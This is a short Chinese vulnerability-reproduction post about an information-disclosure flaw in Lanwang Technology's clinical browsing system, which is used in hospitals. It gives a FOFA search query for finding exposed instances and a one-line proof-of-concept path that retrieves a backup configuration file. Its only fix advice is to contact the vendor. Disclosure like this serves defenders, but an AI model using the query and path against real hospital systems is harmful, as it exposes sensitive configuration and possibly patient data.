【漏洞复现】蓝网科技临床浏览系统信息泄露漏洞

Nx01 产品简介

蓝网科技临床浏览系统是一个专门用于医疗行业的软件系统,主要用于医生、护士和其他医疗专业人员在临床工作中进行信息浏览、查询和管理。

Nx02 漏洞描述

蓝网科技临床浏览系统存在信息泄露漏洞,攻击者可以利用该漏洞获取敏感信息。

Nx03 产品主页

fofa-query: title=="临床浏览"

Nx04 漏洞复现

POC:

复制代码
/config/config%20bak.txt

Nx05 修复建议

建议联系软件厂商进行处理。

相关推荐
ZFJ_张福杰4 分钟前
【技术深度】钱包安全威胁模型 + 防御蓝图
安全·区块链·钱包
程序员哈基耄9 分钟前
隐私与安全工具集:纯客户端安全解决方案
安全
QT 小鲜肉13 分钟前
【Linux命令大全】001.文件管理之chown命令(实操篇)
linux·运维·服务器·笔记
怣疯knight20 分钟前
几个好用的ip纯净度检测网站
网络·ip
全栈工程师修炼指南23 分钟前
Nginx | HTTP 反向代理:对上游服务端返回响应处理实践
运维·网络·nginx·安全·http
永不停歇的蜗牛36 分钟前
K8S之rke2证书过期,如何处理以及遇到的问题
服务器·容器·kubernetes
wanhengidc39 分钟前
电脑端 云手机都有哪些注意事项
运维·服务器·安全·智能手机·云计算
咕噜签名-铁蛋40 分钟前
DDoS攻击:网络安全的隐形风暴
服务器
2022.11.7始学前端1 小时前
n8n第十三节 三个节点测试技巧
运维·服务器·n8n
沧澜sincerely1 小时前
WebSocket 实时聊天功能
网络·websocket·vue·springboot